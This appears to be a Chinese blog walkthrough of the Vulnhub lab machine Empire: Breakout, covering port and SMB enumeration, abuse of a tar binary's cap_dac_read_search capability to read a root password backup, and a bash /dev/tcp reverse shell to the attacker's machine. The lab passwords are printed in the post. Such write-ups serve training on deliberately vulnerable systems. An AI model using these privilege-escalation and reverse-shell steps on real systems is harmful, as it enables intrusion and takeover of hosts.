Vulnhub靶机——EMPIRE: BREAKOUT

已于 2024-04-08 14:52:36 修改
阅读量974 收藏 17
点赞数 29
分类专栏: Vulnhub 文章标签: 网络安全 linux 安全 系统安全
于 2024-04-08 14:27:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W13680336969/article/details/137507189
版权
本文详细描述了一次对Empire:Breakout靶机的渗透过程,涉及信息收集、端口扫描、HTTP端口和SMB服务探测,重点在于利用tar文件的特殊权限进行权限提升并最终获取反弹shell。
摘要由CSDN通过智能技术生成

靶机地址

Empire: Breakout ~ VulnHub

渗透关键点

(1)tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限

(2)backups(备份文件)中存在信息敏感文件

渗透思路总结

(1)信息收集(端口信息,源码泄露,服务扫描)

(2)利用tar文件的特殊权限实现任意文件读取

(3)su登录失败则执行反弹shell

渗透流程

一、信息收集

(1)明确目标

        靶机IP(192.168.186.156)

        攻击机IP(192.168.186.135)

(2)端口扫描(开放端口、服务以及操作系统版本)

nmap -sV -p- -O 192.168.186.156

二、HTTP端口探测

1.80端口测试

(1)访问80端口(靶机IP+端口号)

(2)查看页面源码(观察是否有敏感信息泄露)

        特殊信息:brainfuck编码

(3)bringfuck编码解密(可能是密码)

.2uqPEfj3D<P'a-3

2.端口10000测试

(1)访问可能出现报错(http访问即可)

(2)10000端口是后台登录端

(3)源码检查

3.端口20000测试

(1)访问可能出现报错(http访问即可)

(2)20000端口是用户登录端

(3)源码检查

三、SMB服务探测

服务器开放smb服务,因此使用enum4linux进行针对SMB服务的信息收集

(enum4linux是SMB服务(文件共享协议)专用枚举型扫描器)(拿到用户名)

enum4linux -a 192.168.186.156

四、信息利用

(1)利用账号密码尝试登录平台

(2)成功登录20000端口的用户平台

(3)寻找可用功能点(左下角具备开启用户shell功能)

五、提权

(1)发现敏感文件tar,查看tar文件权限(具有可执行权)

ls -l tar

(2)getcap命令查看tar文件是否具备特殊权限

(特殊权限可以让特定文件在没有root权限情况下对其他文件进行特权操作)

getcap tar

(3)cap_dac_read_search:忽略文件读以及目录搜寻的限制

tar文件具有可执行权,并且具有跨目录读取任意文件的特殊权限

因此可以利用tar文件对重要信息文件进行打包再解压处理,从而实现绕过文件权限限制

(4)回到根目录搜寻信息文件(var/backups/目录下发现隐藏文件.old_pass.bak)

(5)直接访问,发现没有权限

(6)记录文件路径,回到tar文件所在目录下(不回到tar目录下的话是无法使用tar文件的)

        将.old_pass.bak文件压缩为yeah.tar文件包

./tar -cvf yeah.tar /var/backups/.old_pass.bak

(7)解压yeah文件包,实现权限绕过

        拿到root密码:Ts&4&YurgtRX(=~h

tar -xvf yeah.tar

(8)su登录失败,进行反弹shell处理

六、反弹shell

(1)开启监听端口

nc -lvp 6666

(2)靶机输入(bash -i >& /dev/tcp/kali的IP/监听端口号0>&1

bash -i >& /dev/tcp/192.168.186.135/6666 0>&1

(3)成功反弹shell,登陆root用户,提权成功

(4)反弹shell连接时候如果出现连接超时的情况

(排查靶机和攻击机的网关设置模式,同为NAT模式或者同为桥接模式)

Yeah_0day
关注
  • 29
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[Vulnhub]Empire: Breakout
qq_48749937的博客
03-04 4449
kali ip:192.168.56.105 靶机 ip:192.168.56.110 首先还是常规的扫描靶机开放端口情况 这个靶机跟平常只有ssh和http的靶机不同,没有ssh,猜测可能需要获取webshell 首先访问每一个http服务,80端口: 10000端口: 20000端口: 发现存在两个登录页面,但在审计80端口的首页源码时,发现一串密码,是ook加密: 拿到网站去解密,获得一串密码 成功获取密码,但是目前没有账号,想了好久找不到账号该这么找..
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Empire: Breakout
Forever_Han13的博客
04-04 554
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:54 CST Nmap scan report for 192.168.0.1 Host is up (0.00054s latency). MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies) Nmap scan report fo
Vulnhub 靶场 EMPIRE: BREAKOUT
weixin_61951055的博客
11-20 666
Vulnhub 靶场 EMPIRE: BREAKOUT
Vulnhub靶场】EMPIRE: BREAKOUT
DG_s1mple
01-24 3712
环境准备 下载靶机,导入到vmware里面,这应该不用教了吧 开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了 攻击机IP地址为:192.168.2.15 靶机IP地址为:192.168.2.18 信息收集 使用nmap扫描靶机开放的端口信息 发现靶机开放了三个网页端口和SMB服务 我们去网站访问一下 80端口是正常的网页 但当我去查看源码的时候,发现了ook加密的过后的字符串 翻译过来时:别担心没有人会来这里,和你分享我的权限是安全的。它是加密的:) 解密过后是:.2uqPEfj
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3413
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
vulnhub靶场之EMPIRE:BREAKOUT
qq_58091216的博客
01-29 940
Linux中,能力是一种粒度更细的权限系统,用于授予进程执行特定操作的权限,而不是传统的用户和组权限模型。我们已经有了用户的密码,所以我们要着手寻找用户名了,由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举: Enum4linux 可以列出目标系统上的用户和组,包括一些敏感信息,如用户ID(UID)、组ID(GID)、用户描述等。10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。
vulnhub-EMPIRE: BREAKOUT
qq_43006864的博客
05-01 779
Empire: Breakout ~ VulnHub 靶机:EMPIRE: BREAKOUT 攻击机: kali linux Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集 nmap 192.168.1.1/24 nmap -sS -sV -A -p- 192.168.1.107 访问一下80端口 在页面源码的最底部发...
靶机1 Empire:Breakout(帝国突围)
honest_gg的博客
09-09 1178
靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
靶机渗透练习42-Empire Breakout
hirak0的博客
04-19 2340
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-breakout,751/ Description Difficulty: Easy This box was created to be an Easy box, but it can be Medium if you get lost. For hints discord Server ( https://discord.gg/7asvAhCEhe ) 一、搭建靶机环境 攻击机Kali: IP地址:192
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
qq_51577576的博客
03-05 1372
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
vulnhub靶机:Empire: Breakout
最新发布
weixin_69670995的博客
05-13 835
发现它是可以读取任意的文件,但是不知道/root目录下有什么文件,到着没有思路了,查看网上资料在/var/ backups目录下面有一个.old_pass.bak文件,我们使用tar去查看一下这文件里的内容(先将.old_pass.bak文件进行压缩到家目录下,然后解压到家目录下,使用cat命令查看文件)试了很多次,发现不让输入密码,这就很无语,报"Authentication failure"错误,我知道的报这个错误的原因是密码输入错误或者是root没有设置密码,尝试一下反弹shell吧。
Vulnhub 渗透练习(一)—— Breach 1.0
shinygod的博客
02-14 580
跟着大佬们的步伐结合自己的思考,学会了很多东西,很多平时不曾注意到的点,也稍微知道了一些渗透的简要步骤。
Vulnhub靶机:empire breakout
qq_48904485的博客
01-08 880
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:empire:breakout(10.0.2.11)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值